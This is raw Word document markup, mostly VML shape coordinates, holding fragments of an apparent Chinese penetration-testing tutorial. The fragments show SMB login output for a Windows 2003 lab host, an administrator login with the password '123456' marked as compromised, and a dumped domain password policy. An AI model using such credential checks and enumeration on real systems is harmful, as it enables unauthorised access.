3431,5895,3431,5893,3431,5892,3431,5890,3431,5888,3431,5887,3431,5885,3431,5883,3431,5882,3431,5880,3431,5878,3431,5876,3431,5874,3431,5872,3431,5870,3431,5868,3431,5866,3431,5864,3431,5861,3431,5859,3431,5857,3431,5855,3431,5852,3431,5850,3431,5847,3431,5845,3431,5842,3431,5840,3431,5837,3431,5834,3431,5831,3431,5829,3431,5826,3431,5823,3431,5820,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3431,5817,3430,5817,3430,5817,3430,5817,3430,5817,3430,5817,3430,5817,3430,5817,3430,5817,3430,5817,3429,5817,3429,5817,3429,5817,3429,5817,3428,5817,3428,5817,3428,5817,3427,5817,3427,5817,3427,5817,3426,5817,3426,5817,3425,5817,3425,5817,3424,5817,3424,5817,3423,5817,3422,5817,3422,5817,3421,5817,3420,5817,3420,5817,3419,5817,3418,5817,3417,5817,3416,5817,3415,5817,3414,5817,3413,5817,3412,5817,3411,5817,3409,5817,3408,5817,3407,5817,3406,5817,3404,5817,3403,5817,3401,5817,3400,5817,3398,5817,3396,5817,3395,5817,3393,5817,3391,5817,3389,5817,3387,5817,3385,5817,3383,5817,3381,5817,3379,5817,3377,5817,3374,5817,3372,5817,3369,5817,3367,5817,3364,5817,3362,5817,3359,5817,3356,5817,3353,5817,3350,5817,3347,5817,3344,5817,3341,5817,3338,5817,3334,5817,3331,5817,3328,5817,3324,5817,3320,5817,3317,5817,3313,5817,3309,5817,3305,5817,3301,5817,3297,5817,3293,5817,3288,5817,3284,5817,3279,5817,3275,5817,3270,5817,3265,5817,3260,5817,3255,5817,3250,5817,3245,5817,3240,5817,3235,5817,3229,5817,3224,5817,3218,5817,3212,5817,3206,5817,3200,5817,3194,5817,3188,5817,3182,5817,3176e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:91.500pt;margin-top:171.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1830,3430" coordsize="130,270">
        <v:shape style="position:absolute;left:1830;top:3430;width:130;height:270" coordorigin="1830,3430" coordsize="130,270" path="m1840,3446l1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1840,3446,1841,3446,1841,3446,1841,3446,1841,3446,1841,3446,1841,3446,1841,3446,1841,3446,1842,3446,1842,3446,1842,3446,1842,3446,1842,3446,1843,3446,1843,3446,1843,3446,1844,3446,1844,3446,1844,3446,1844,3446,1845,3446,1845,3446,1846,3446,1846,3446,1846,3446,1847,3446,1847,3446,1848,3446,1848,3446,1849,3446,1849,3446,1850,3446,1851,3446,1851,3446,1852,3446,1852,3446,1853,3446,1854,3446,1855,3446,1855,3446,1856,3446,1857,3446,1858,3446,1859,3446,1859,3446,1860,3446,1861,3446,1862,3446,1863,3446,1864,3446,1865,3446,1867,3446,1868,3446,1869,3446,1870,3446,1871,3446,1872,3446,1874,3446,1875,3446,1876,3446,1878,3446,1879,3446,1881,3446,1882,3446,1884,3446,1885,3446,1887,3446,1888,3446,1890,3446,1892,3446,1894,3446,1895,3446,1897,3446,1899,3446,1901,3446,1903,3446,1905,3446,1907,3446,1909,3446,1911,3446,1913,3446,1916,3446,1918,3446,1920,3446,1922,3446,1925,3446,1927,3446,1930,3446,1932,3446,1935,3446,1937,3446,1940,3446,1943,3446,1945,3446,1948,3446,1951,3446,1954,3446,1957,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3446,1960,3447,1960,3447,1960,3447,1960,3447,1960,3447,1960,3448,1960,3448,1960,3448,1960,3448,1960,3449,1960,3449,1960,3449,1960,3450,1960,3450,1960,3451,1960,3451,1960,3452,1960,3452,1960,3453,1960,3453,1960,3454,1960,3455,1960,3455,1960,3456,1960,3457,1960,3458,1960,3459,1960,3460,1960,3460,1960,3461,1960,3462,1960,3464,1960,3465,1960,3466,1960,3467,1960,3468,1960,3470,1960,3471,1960,3472,1960,3474,1960,3475,1960,3477,1960,3478,1960,3480,1960,3482,1960,3484,1960,3485,1960,3487,1960,3489,1960,3491,1960,3493,1960,3495,1960,3498,1960,3500,1960,3502,1960,3505,1960,3507,1960,3510,1960,3512,1960,3515,1960,3518,1960,3520,1960,3523,1960,3526,1960,3529,1960,3532,1960,3535,1960,3539,1960,3542,1960,3545,1960,3549,1960,3552,1960,3556,1960,3560,1960,3564,1960,3568,1960,3571,1960,3576,1960,3580,1960,3584,1960,3588,1960,3593,1960,3597,1960,3602,1960,3606,1960,3611,1960,3616,1960,3621,1960,3626,1960,3631,1960,3636,1960,3642,1960,3647,1960,3653,1960,3658,1960,3664,1960,3670,1960,3676,1960,3682,1960,3688,1960,3694,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1960,3701,1959,3701,1959,3701,1959,3701,1959,3701,1959,3701,1959,3701,1959,3701,1959,3701,1959,3701,1958,3701,1958,3701,1958,3701,1958,3701,1958,3701,1957,3701,1957,3701,1957,3701,1957,3701,1956,3701,1956,3701,1956,3701,1955,3701,1955,3701,1955,3701,1954,3701,1954,3701,1953,3701,1953,3701,1953,3701,1952,3701,1952,3701,1951,3701,1951,3701,1950,3701,1949,3701,1949,3701,1948,3701,1947,3701,1947,3701,1946,3701,1945,3701,1945,3701,1944,3701,1943,3701,1942,3701,1941,3701,1940,3701,1940,3701,1939,3701,1938,3701,1937,3701,1936,3701,1934,3701,1933,3701,1932,3701,1931,3701,1930,3701,1929,3701,1927,3701,1926,3701,1925,3701,1924,3701,1922,3701,1921,3701,1919,3701,1918,3701,1916,3701,1915,3701,1913,3701,1911,3701,1910,3701,1908,3701,1906,3701,1905,3701,1903,3701,1901,3701,1899,3701,1897,3701,1895,3701,1893,3701,1891,3701,1889,3701,1887,3701,1884,3701,1882,3701,1880,3701,1878,3701,1875,3701,1873,3701,1870,3701,1868,3701,1865,3701,1863,3701,1860,3701,1857,3701,1854,3701,1852,3701,1849,3701,1846,3701,1843,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3701,1840,3700,1840,3700,1840,3700,1840,3700,1840,3700,1840,3700,1840,3700,1840,3699,1840,3699,1840,3699,1840,3699,1840,3698,1840,3698,1840,3698,1840,3698,1840,3697,1840,3697,1840,3696,1840,3696,1840,3695,1840,3695,1840,3694,1840,3694,1840,3693,1840,3693,1840,3692,1840,3691,1840,3690,1840,3690,1840,3689,1840,3688,1840,3687,1840,3686,1840,3685,1840,3684,1840,3683,1840,3682,1840,3681,1840,3680,1840,3678,1840,3677,1840,3676,1840,3674,1840,3673,1840,3671,1840,3670,1840,3668,1840,3666,1840,3665,1840,3663,1840,3661,1840,3659,1840,3657,1840,3655,1840,3653,1840,3651,1840,3649,1840,3647,1840,3644,1840,3642,1840,3640,1840,3637,1840,3634,1840,3632,1840,3629,1840,3626,1840,3623,1840,3620,1840,3617,1840,3614,1840,3611,1840,3608,1840,3605,1840,3601,1840,3598,1840,3594,1840,3590,1840,3587,1840,3583,1840,3579,1840,3575,1840,3571,1840,3567,1840,3563,1840,3558,1840,3554,1840,3549,1840,3545,1840,3540,1840,3535,1840,3531,1840,3526,1840,3521,1840,3515,1840,3510,1840,3505,1840,3499,1840,3494,1840,3488,1840,3482,1840,3477,1840,3471,1840,3465,1840,3458,1840,3452,1840,3446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:190.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,3810" coordsize="130,250">
        <v:shape style="position:absolute;left:5790;top:3810;width:130;height:250" coordorigin="5790,3810" coordsize="130,250" path="m5817,3821l5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5819,3821,5819,3821,5819,3821,5819,3821,5819,3821,5820,3821,5820,3821,5820,3821,5821,3821,5821,3821,5821,3821,5821,3821,5822,3821,5822,3821,5823,3821,5823,3821,5823,3821,5824,3821,5824,3821,5825,3821,5825,3821,5826,3821,5826,3821,5827,3821,5828,3821,5828,3821,5829,3821,5829,3821,5830,3821,5831,3821,5832,3821,5832,3821,5833,3821,5834,3821,5835,3821,5836,3821,5836,3821,5837,3821,5838,3821,5839,3821,5840,3821,5841,3821,5842,3821,5844,3821,5845,3821,5846,3821,5847,3821,5848,3821,5849,3821,5851,3821,5852,3821,5853,3821,5855,3821,5856,3821,5858,3821,5859,3821,5861,3821,5862,3821,5864,3821,5865,3821,5867,3821,5869,3821,5871,3821,5872,3821,5874,3821,5876,3821,5878,3821,5880,3821,5882,3821,5884,3821,5886,3821,5888,3821,5890,3821,5893,3821,5895,3821,5897,3821,5899,3821,5902,3821,5904,3821,5907,3821,5909,3821,5912,3821,5914,3821,5917,3821,5920,3821,5922,3821,5925,3821,5928,3821,5931,3821,5934,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3822,5937,3822,5937,3822,5937,3822,5937,3822,5937,3822,5937,3823,5937,3823,5937,3823,5937,3823,5937,3824,5937,3824,5937,3824,5937,3825,5937,3825,5937,3825,5937,3826,5937,3826,5937,3827,5937,3827,5937,3828,5937,3829,5937,3829,5937,3830,5937,3831,5937,3831,5937,3832,5937,3833,5937,3834,5937,3835,5937,3836,5937,3837,5937,3838,5937,3839,5937,3840,5937,3841,5937,3842,5937,3843,5937,3845,5937,3846,5937,3848,5937,3849,5937,3850,5937,3852,5937,3854,5937,3855,5937,3857,5937,3859,5937,3861,5937,3863,5937,3864,5937,3866,5937,3869,5937,3871,5937,3873,5937,3875,5937,3877,5937,3880,5937,3882,5937,3885,5937,3887,5937,3890,5937,3893,5937,3896,5937,3898,5937,3901,5937,3904,5937,3907,5937,3911,5937,3914,5937,3917,5937,3921,5937,3924,5937,3928,5937,3931,5937,3935,5937,3939,5937,3943,5937,3947,5937,3951,5937,3955,5937,3959,5937,3963,5937,3968,5937,3972,5937,3977,5937,3982,5937,3986,5937,3991,5937,3996,5937,4001,5937,4006,5937,4012,5937,4017,5937,4022,5937,4028,5937,4034,5937,4039,5937,4045,5937,4051,5937,4057,5937,4063,5937,4070,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5935,4076,5935,4076,5935,4076,5935,4076,5935,4076,5934,4076,5934,4076,5934,4076,5934,4076,5933,4076,5933,4076,5933,4076,5932,4076,5932,4076,5932,4076,5931,4076,5931,4076,5930,4076,5930,4076,5930,4076,5929,4076,5929,4076,5928,4076,5928,4076,5927,4076,5926,4076,5926,4076,5925,4076,5924,4076,5924,4076,5923,4076,5922,4076,5922,4076,5921,4076,5920,4076,5919,4076,5918,4076,5917,4076,5917,4076,5916,4076,5915,4076,5914,4076,5913,4076,5911,4076,5910,4076,5909,4076,5908,4076,5907,4076,5906,4076,5904,4076,5903,4076,5902,4076,5901,4076,5899,4076,5898,4076,5896,4076,5895,4076,5893,4076,5892,4076,5890,4076,5888,4076,5887,4076,5885,4076,5883,4076,5882,4076,5880,4076,5878,4076,5876,4076,5874,4076,5872,4076,5870,4076,5868,4076,5866,4076,5864,4076,5861,4076,5859,4076,5857,4076,5855,4076,5852,4076,5850,4076,5847,4076,5845,4076,5842,4076,5840,4076,5837,4076,5834,4076,5831,4076,5829,4076,5826,4076,5823,4076,5820,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4075,5817,4075,5817,4075,5817,4075,5817,4075,5817,4075,5817,4074,5817,4074,5817,4074,5817,4074,5817,4073,5817,4073,5817,4073,5817,4072,5817,4072,5817,4072,5817,4071,5817,4071,5817,4070,5817,4070,5817,4069,5817,4068,5817,4068,5817,4067,5817,4066,5817,4066,5817,4065,5817,4064,5817,4063,5817,4062,5817,4061,5817,4060,5817,4059,5817,4058,5817,4057,5817,4056,5817,4055,5817,4054,5817,4052,5817,4051,5817,4049,5817,4048,5817,4047,5817,4045,5817,4043,5817,4042,5817,4040,5817,4038,5817,4036,5817,4034,5817,4033,5817,4031,5817,4028,5817,4026,5817,4024,5817,4022,5817,4020,5817,4017,5817,4015,5817,4012,5817,4010,5817,4007,5817,4004,5817,4001,5817,3999,5817,3996,5817,3993,5817,3989,5817,3986,5817,3983,5817,3980,5817,3976,5817,3973,5817,3969,5817,3966,5817,3962,5817,3958,5817,3954,5817,3950,5817,3946,5817,3942,5817,3938,5817,3934,5817,3929,5817,3925,5817,3920,5817,3915,5817,3911,5817,3906,5817,3901,5817,3896,5817,3891,5817,3885,5817,3880,5817,3875,5817,3869,5817,3863,5817,3858,5817,3852,5817,3846,5817,3840,5817,3834,5817,3827,5817,3821e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:414.500pt;margin-top:542.500pt;width:18.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8290,10850" coordsize="370,270">
        <v:shape style="position:absolute;left:8290;top:10850;width:370;height:270" coordorigin="8290,10850" coordsize="370,270" path="m8308,10874l8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8309,10874,8309,10874,8309,10874,8309,10874,8309,10874,8309,10874,8309,10874,8310,10874,8310,10874,8310,10874,8310,10874,8311,10874,8311,10874,8312,10874,8312,10874,8312,10874,8313,10874,8313,10874,8314,10874,8315,10874,8315,10874,8316,10874,8317,10874,8317,10874,8318,10874,8319,10874,8320,10874,8321,10874,8322,10874,8323,10874,8324,10874,8325,10874,8326,10874,8328,10874,8329,10874,8330,10874,8332,10874,8333,10874,8335,10874,8337,10874,8338,10874,8340,10874,8342,10874,8344,10874,8346,10874,8348,10874,8350,10874,8352,10874,8354,10874,8357,10874,8359,10874,8362,10874,8364,10874,8367,10874,8370,10874,8372,10874,8375,10874,8378,10874,8381,10874,8385,10874,8388,10874,8391,10874,8395,10874,8398,10874,8402,10874,8406,10874,8410,10874,8414,10874,8418,10874,8422,10874,8426,10874,8430,10874,8435,10874,8439,10874,8444,10874,8449,10874,8454,10874,8459,10874,8464,10874,8469,10874,8475,10874,8480,10874,8486,10874,8491,10874,8497,10874,8503,10874,8509,10874,8516,10874,8522,10874,8528,10874,8535,10874,8542,10874,8549,10874,8556,10874,8563,10874,8570,10874,8577,10874,8585,10874,8593,10874,8600,10874,8608,10874,8617,10874,8625,10874,8633,10874,8642,10874,8651,10874,8659,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10876,8668,10876,8668,10876,8668,10876,8668,10876,8668,10877,8668,10877,8668,10877,8668,10877,8668,10878,8668,10878,8668,10879,8668,10879,8668,10879,8668,10880,8668,10880,8668,10881,8668,10882,8668,10882,8668,10883,8668,10883,8668,10884,8668,10885,8668,10886,8668,10887,8668,10887,8668,10888,8668,10889,8668,10890,8668,10891,8668,10892,8668,10893,8668,10895,8668,10896,8668,10897,8668,10898,8668,10900,8668,10901,8668,10903,8668,10904,8668,10906,8668,10907,8668,10909,8668,10911,8668,10912,8668,10914,8668,10916,8668,10918,8668,10920,8668,10922,8668,10924,8668,10926,8668,10929,8668,10931,8668,10933,8668,10936,8668,10938,8668,10941,8668,10944,8668,10946,8668,10949,8668,10952,8668,10955,8668,10958,8668,10961,8668,10964,8668,10967,8668,10971,8668,10974,8668,10978,8668,10981,8668,10985,8668,10989,8668,10992,8668,10996,8668,11000,8668,11004,8668,11008,8668,11013,8668,11017,8668,11021,8668,11026,8668,11030,8668,11035,8668,11040,8668,11045,8668,11050,8668,11055,8668,11060,8668,11065,8668,11071,8668,11076,8668,11082,8668,11087,8668,11093,8668,11099,8668,11105,8668,11111,8668,11117,8668,11123,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8667,11130,8667,11130,8667,11130,8667,11130,8667,11130,8666,11130,8666,11130,8666,11130,8665,11130,8665,11130,8665,11130,8664,11130,8664,11130,8663,11130,8663,11130,8662,11130,8661,11130,8661,11130,8660,11130,8659,11130,8658,11130,8658,11130,8657,11130,8656,11130,8655,11130,8654,11130,8653,11130,8651,11130,8650,11130,8649,11130,8648,11130,8646,11130,8645,11130,8643,11130,8642,11130,8640,11130,8638,11130,8637,11130,8635,11130,8633,11130,8631,11130,8629,11130,8627,11130,8624,11130,8622,11130,8620,11130,8617,11130,8615,11130,8612,11130,8610,11130,8607,11130,8604,11130,8601,11130,8598,11130,8595,11130,8592,11130,8589,11130,8585,11130,8582,11130,8578,11130,8575,11130,8571,11130,8567,11130,8563,11130,8559,11130,8555,11130,8551,11130,8546,11130,8542,11130,8537,11130,8532,11130,8528,11130,8523,11130,8518,11130,8513,11130,8507,11130,8502,11130,8496,11130,8491,11130,8485,11130,8479,11130,8473,11130,8467,11130,8461,11130,8455,11130,8448,11130,8442,11130,8435,11130,8428,11130,8421,11130,8414,11130,8407,11130,8399,11130,8392,11130,8384,11130,8376,11130,8368,11130,8360,11130,8352,11130,8343,11130,8335,11130,8326,11130,8317,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11128,8308,11128,8308,11128,8308,11128,8308,11128,8308,11127,8308,11127,8308,11127,8308,11126,8308,11126,8308,11126,8308,11125,8308,11125,8308,11124,8308,11124,8308,11123,8308,11123,8308,11122,8308,11121,8308,11121,8308,11120,8308,11119,8308,11118,8308,11118,8308,11117,8308,11116,8308,11115,8308,11114,8308,11113,8308,11112,8308,11111,8308,11110,8308,11108,8308,11107,8308,11106,8308,11104,8308,11103,8308,11102,8308,11100,8308,11099,8308,11097,8308,11095,8308,11094,8308,11092,8308,11090,8308,11088,8308,11086,8308,11084,8308,11082,8308,11080,8308,11078,8308,11075,8308,11073,8308,11071,8308,11068,8308,11066,8308,11063,8308,11060,8308,11058,8308,11055,8308,11052,8308,11049,8308,11046,8308,11043,8308,11040,8308,11037,8308,11033,8308,11030,8308,11026,8308,11023,8308,11019,8308,11016,8308,11012,8308,11008,8308,11004,8308,11000,8308,10996,8308,10991,8308,10987,8308,10983,8308,10978,8308,10974,8308,10969,8308,10964,8308,10959,8308,10954,8308,10949,8308,10944,8308,10939,8308,10934,8308,10928,8308,10923,8308,10917,8308,10911,8308,10905,8308,10899,8308,10893,8308,10887,8308,10881,8308,10874e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:597.600pt;width:467.400pt;height:137.40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密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>码策略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'123456'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‐‐pass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‐p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ol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3790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Pack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name:WIN03X64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domain:WIN03X64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SMBv1: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WIN03X64\administrator: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Pwn3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d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="2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Dumping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info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domain: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W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IN03X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64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Minimum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length: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None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history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length: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None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Maximum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age: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days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hours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47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minutes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WIN03X64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Complexity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Flags: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000000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Refuse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Change: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Store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Cleartext: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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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Lockout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Admins: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2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Clear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Change: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Anon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Change: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Complex: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Minimum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age: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None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Account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Lockout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Counter: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30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minut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es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Locked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Account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Duration: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minutes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Account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Lockout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Threshold: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None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265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Forced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Log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Time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Not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22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list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-45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hash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70.500pt;width:0.500pt;height:312.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1410" coordsize="10,6250">
        <v:shape style="position:absolute;left:10390;top:1410;width:10;height:6250" coordorigin="10390,1410" coordsize="10,6250" path="m10402,1420l10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1421,10402,1421,10402,1422,10402,1422,10402,1423,10402,1425,10402,1426,10402,1428,10402,1430,10402,1432,10402,1435,10402,1438,10402,1441,10402,1445,10402,1449,10402,1454,10402,1459,10402,1465,10402,1471,10402,1478,10402,1485,10402,1493,10402,1501,10402,1510,10402,1520,10402,1530,10402,1541,10402,1553,10402,1565,10402,1579,10402,1593,10402,1607,10402,1623,10402,1639,10402,1657,10402,1675,10402,1694,10402,1714,10402,1735,10402,1757,10402,1780,10402,1804,10402,1829,10402,1856,10402,1883,10402,1911,10402,1941,10402,1971,10402,2003,10402,2036,10402,2070,10402,2106,10402,2143,10402,2181,10402,2220,10402,2261,10402,2303,10402,2346,10402,2391,10402,2437,10402,2485,10402,2534,10402,2585,10402,2637,10402,2690,10402,2746,10402,2803,10402,2861,10402,2921,10402,2983,10402,3046,10402,3111,10402,3178,10402,3246,10402,3317,10402,3389,10402,3462,10402,3538,10402,3616,10402,3695,10402,3776,10402,3859,10402,3944,10402,4031,10402,4120,10402,4212,10402,4305,10402,4400,10402,4497,10402,4596,10402,4697,10402,4801,10402,4907,10402,5014,10402,5124,10402,5237,10402,5351,10402,5468,10402,5587,10402,5708,10402,5832,10402,5958,10402,6087,10402,6218,10402,6351,10402,6486,10402,6625,10402,6765,10402,6909,10402,7054,10402,7202,10402,7353,10402,7507,10402,7663e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1410;width:8990;height:390" coordorigin="1490,1410" coordsize="8990,390" path="m1510,1420l1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1511,1420,1512,1420,1512,1420,1514,1420,1515,1420,1517,1420,1519,1420,1521,1420,1524,1420,1528,1420,1532,1420,1536,1420,1541,1420,1546,1420,1552,1420,1559,1420,1566,1420,1575,1420,1583,1420,1593,1420,1603,1420,1615,1420,1627,1420,1640,1420,1654,1420,1668,1420,1684,1420,1701,1420,1719,1420,1738,1420,1758,1420,1780,1420,1802,1420,1826,1420,1851,1420,1877,1420,1904,1420,1933,1420,1963,1420,1995,1420,2028,1420,2063,1420,2099,1420,2136,1420,2175,1420,2216,1420,2259,1420,2303,1420,2348,1420,2396,1420,2445,1420,2496,1420,2549,1420,2604,1420,2660,1420,2719,1420,2779,1420,2841,1420,2906,1420,2972,1420,3041,1420,3112,1420,3184,1420,3259,1420,3336,1420,3416,1420,3498,1420,3582,1420,3668,1420,3757,1420,3848,1420,3941,1420,4037,1420,4136,1420,4236,1420,4340,1420,4446,1420,4555,1420,4666,1420,4780,1420,4897,1420,5017,1420,5139,1420,5264,1420,5392,1420,5523,1420,5657,1420,5793,1420,5933,1420,6076,1420,6222,1420,6370,1420,6522,1420,6677,1420,6835,1420,6997,1420,7161,1420,7329,1420,7500,1420,7675,1420,7853,1420,8034,1420,8219,1420,8407,1420,8598,1420,8793,1420,8992,1420,9194,1420,9400,1420,9609,1420,9823,1420,10039,1420,10260,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1421,10484,1421,10484,1421,10484,1421,10484,1422,10484,1422,10484,1422,10484,1423,10484,1423,10484,1423,10484,1424,10484,1424,10484,1425,10484,1425,10484,1426,10484,1427,10484,1427,10484,1428,10484,1429,10484,1430,10484,1431,10484,1431,10484,1432,10484,1433,10484,1435,10484,1436,10484,1437,10484,1438,10484,1439,10484,1441,10484,1442,10484,1444,10484,1445,10484,1447,10484,1449,10484,1450,10484,1452,10484,1454,10484,1456,10484,1458,10484,1460,10484,1463,10484,1465,10484,1467,10484,1470,10484,1472,10484,1475,10484,1478,10484,1480,10484,1483,10484,1486,10484,1489,10484,1493,10484,1496,10484,1499,10484,1503,10484,1506,10484,1510,10484,1514,10484,1517,10484,1521,10484,1525,10484,1530,10484,1534,10484,1538,10484,1543,10484,1547,10484,1552,10484,1557,10484,1562,10484,1567,10484,1572,10484,1578,10484,1583,10484,1589,10484,1594,10484,1600,10484,1606,10484,1612,10484,1618,10484,1625,10484,1631,10484,1638,10484,1644,10484,1651,10484,1658,10484,1665,10484,1673,10484,1680,10484,1688,10484,1695,10484,1703,10484,1711,10484,1720,10484,1728,10484,1736,10484,1745,10484,1754,10484,1763,10484,1772,10484,1781,10484,1791,10484,1800,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10483,1810,10482,1810,10482,1810,10480,1810,10479,1810,10477,1810,10475,1810,10473,1810,10470,1810,10466,1810,10462,1810,10458,1810,10453,1810,10448,1810,10442,1810,10435,1810,10428,1810,10419,1810,10411,1810,10401,1810,10391,1810,10379,1810,10367,1810,10354,1810,10340,1810,10326,1810,10310,1810,10293,1810,10275,1810,10256,1810,10236,1810,10215,1810,10192,1810,10168,1810,10143,1810,10117,1810,10090,1810,10061,1810,10031,1810,9999,1810,9966,1810,9931,1810,9895,1810,9858,1810,9819,1810,9778,1810,9735,1810,9691,1810,9646,1810,9598,1810,9549,1810,9498,1810,9445,1810,9391,1810,9334,1810,9275,1810,9215,1810,9153,1810,9088,1810,9022,1810,8953,1810,8883,1810,8810,1810,8735,1810,8658,1810,8578,1810,8497,1810,8413,1810,8326,1810,8238,1810,8146,1810,8053,1810,7957,1810,7859,1810,7758,1810,7654,1810,7548,1810,7439,1810,7328,1810,7214,1810,7097,1810,6977,1810,6855,1810,6730,1810,6602,1810,6471,1810,6337,1810,6201,1810,6061,1810,5918,1810,5773,1810,5624,1810,5472,1810,5317,1810,5159,1810,4997,1810,4833,1810,4665,1810,4494,1810,4319,1810,4141,1810,3960,1810,3776,1810,3587,1810,3396,1810,3201,1810,3002,1810,2800,1810,2594,1810,2385,1810,2172,1810,1955,1810,1734,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1808,1510,1808,1510,1808,1510,1807,1510,1807,1510,1807,1510,1806,1510,1806,1510,1805,1510,1805,1510,1804,1510,1804,1510,1803,1510,1802,1510,1802,1510,1801,1510,1800,1510,1799,1510,1798,1510,1797,1510,1796,1510,1795,1510,1794,1510,1793,1510,1791,1510,1790,1510,1789,1510,1787,1510,1786,1510,1784,1510,1783,1510,1781,1510,1779,1510,1777,1510,1775,1510,1773,1510,1771,1510,1769,1510,1767,1510,1765,1510,1762,1510,1760,1510,1757,1510,1755,1510,1752,1510,1749,1510,1746,1510,1743,1510,1740,1510,1